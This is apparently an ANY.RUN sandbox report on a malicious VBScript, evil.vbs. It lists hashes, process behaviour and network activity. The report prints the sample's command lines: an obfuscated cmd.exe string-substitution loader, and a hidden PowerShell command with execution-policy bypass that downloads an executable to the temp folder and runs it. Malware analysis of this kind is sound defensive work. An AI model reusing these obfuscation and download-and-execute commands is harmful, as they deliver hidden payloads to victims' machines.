analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

evil.vbs

Full analysis: https://app.any.run/tasks/2f8f5b5c-c73d-4334-b32e-880fc45b3243
Verdict: Malicious activity
Analysis date: November 29, 2020, 20:40:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

1C432AFC30F358CD3D75324E74F1A62B

SHA1:

520BC9E8EADD3EDED7749C1F5A64C4866236B42D

SHA256:

DCE0F5EEBDB3F4DFC170E9FED9B686D234456114D8397001D8F0CBBEC4AE5E3E

SSDEEP:

24:l6NwdKtvTHjeTgWwJSI8lUSn99233KJiQJolT3mnSPDtF:lhwvzjeEWHUSn99GKJrilT3MSPP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3708)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2552)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2364)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2364"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\evil.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3708"C:\Windows\System32\cmd.exe" /v:ON /c"set mention= && set scientists=M-/4TtB@uZJ3G.~%egX+,rp7KP'h1W0vIjEUD(F;5\kH6iwLA=$2Yxy NzaR_QcVl)8Oq9Ssfbn:Cdmo && for %H in (22,79,46,16,21,71,27,16,64,64,13,16,53,16,55,1,46,55,27,45,77,77,16,74,55,1,16,22,55,73,54,22,58,71,71,55,37,56,16,46,1,67,73,33,16,62,5,55,70,54,71,5,16,78,13,56,16,5,13,29,16,73,76,64,45,16,74,5,65,13,36,79,46,74,64,79,58,77,38,45,64,16,37,26,27,5,5,22,71,75,2,2,5,27,16,13,16,58,21,5,27,13,64,45,2,14,71,17,5,58,5,27,58,78,2,22,8,5,5,54,2,64,58,5,16,71,5,2,46,11,51,2,22,8,5,5,54,13,16,53,16,26,20,50,16,74,31,75,5,16,78,22,55,19,55,26,41,58,73,21,58,27,58,78,13,16,53,16,26,65,39,3244) DO (set mention=!mention!!scientists:~%H,1!) && if %H == 3244 call !mention:~-171!" && C:\Users\admin\AppData\Local\Temp/abraham.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2552powershell.exe -w hidden -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe',$env:temp + '\abraham.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
376
Read events
305
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2552powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JTYYVL9UWY0B1ASUX91H.temp
MD5:
SHA256:
2552powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:F17FB243611FC8D2B382ABB444B83A98
SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869
2552powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF127392.TMPbinary
MD5:F17FB243611FC8D2B382ABB444B83A98
SHA256:B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2552
powershell.exe
93.93.131.124:443
the.earth.li
Mythic Beasts Ltd
GB
suspicious

DNS requests

Domain
IP
Reputation
the.earth.li
  • 93.93.131.124
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
evil.vbs